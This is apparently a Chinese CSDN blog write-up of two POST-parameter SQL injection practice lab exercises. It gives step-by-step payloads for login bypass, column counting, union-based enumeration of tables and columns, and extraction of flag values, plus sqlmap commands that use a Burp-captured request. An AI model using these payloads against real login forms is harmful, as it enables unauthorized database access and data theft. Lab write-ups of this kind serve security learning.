sql post显错注入练习

本文详细介绍了如何利用SQL注入漏洞进行POST参数的攻击,包括判断注入点、字段数、显错位、表名和字段名的探测,以及具体数据的获取。同时提到了使用sqlmap工具进行自动化注入测试的方法,展示了两种不同的使用方式。
摘要由CSDN通过智能技术生成

第一题:

1.判断是否存在SQL注入漏洞

用户名框输入 1’ or 1=1 — qwe(万能密码),提交,成功登陆。
显示Your Login name:admin,Your Password:as4dsa2dsad2a3

2.利用order by判断字段数

用户名框输入a’ or 1=1 order by 3 — qwe,提交,成功登陆。
用户名框输入a’ or 1=1 order by 4 — qwe,提交,账号密码错误。
说明有3个字段。

3.通过union联合查询,判断显错位

用户名框输入a’ union select 1,2,3 — qwe,提交,显示2,3,可见显错位为第2,3位。

4.判断表名。

用户名框输入a’ union select 1,2,table_name from information_schema.tables where table_schema =database() limit 0,1 — qwe ,得到表名flag

用户名框输入a’ union select 1,2,table_name from information_schema.tables where table_schema =database() limit 1,1 — qwe ,得到表名user

5.判断字段名。

用户名框输入 a’ union select 1,2,column_name from information_schema.columns where table_schema =database() and table_name=’flag’ limit 0,1 — qwe ,得到字段名ID

用户名框输入 a’ union select 1,2,column_name from information_schema.columns where table_schema =database() and table_name=’flag’ limit 1,1 — qwe ,得到字段名flag

6.寻找具体数据.

用户名框输入 a’ union select 1,2,flag from flag limit 0,1 — qwe ,得到zKaQ-PostK1
用户名框输入 a’ union select 1,2,flag from flag limit 1,1 — qwe ,得到zKaQ-XZT
用户名框输入 a’ union select 1,2,flag from flag limit 2,1 — qwe ,得到zKaQ-FlagA1

Sqlmap 做 post注入:

方法一:—form http://inject2.lab.aqlab.cn/Pass-05/index.php
方法二(建议使用):-r 抓数据包。打开网页,打开浏览器插件burp,打开burp软件,输入用户名密码提交,抓取数据包。复制到txt,把txt文件放在sql路径文件夹中。从该文件夹打开cmd命令行。输入python sqlmap.py -r 文件路径(可以直接把文件拖进cmd就出来了文件路径)→测试得到存在post注入→输入python sqlmap.py -r 文件路径(可以直接把文件拖进cmd就出来了文件路径) —dbs(—level 3 — risk 2)→得到库名→表名→字段名→拿数据。

第二题:

1.判断是否存在SQL注入漏洞

用户名框输入 1”) or 1=1 — qwe(万能密码),提交,成功登陆。
显示Your Login name:admin,Your Password:as4dsa2dsad2a3

2.利用order by判断字段数

用户名框输入a”) or 1=1 order by 3 — qwe,提交,成功登陆。
用户名框输入a”) or 1=1 order by 4 — qwe,提交,账号密码错误。
说明有3个字段。

3.通过union联合查询,判断显错位

用户名框输入a”) union select 1,2,3 — qwe,提交,显示2,3,可见显错位为第2,3位。

4.判断表名。

用户名框输入a”) union select 1,2,table_name from information_schema.tables where table_schema =database() limit 0,1 — qwe ,得到表名flag

用户名框输入a”) union select 1,2,table_name from information_schema.tables where table_schema =database() limit 1,1 — qwe ,得到表名user

5.判断字段名。

用户名框输入 a”) union select 1,2,column_name from information_schema.columns where table_schema =database() and table_name=’flag’ limit 0,1 — qwe ,得到字段名ID

用户名框输入 a”) union select 1,2,column_name from information_schema.columns where table_schema =database() and table_name=’flag’ limit 1,1 — qwe ,得到字段名flag

6.寻找具体数据.

用户名框输入 a”) union select 1,2,flag from flag limit 0,1 — qwe ,得到zKaQ-PostK1
用户名框输入 a”) union select 1,2,flag from flag limit 1,1 — qwe ,得到zKaQ-XZT
用户名框输入 a”) union select 1,2,flag from flag limit 2,1 — qwe ,得到zKaQ-FlagA1

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值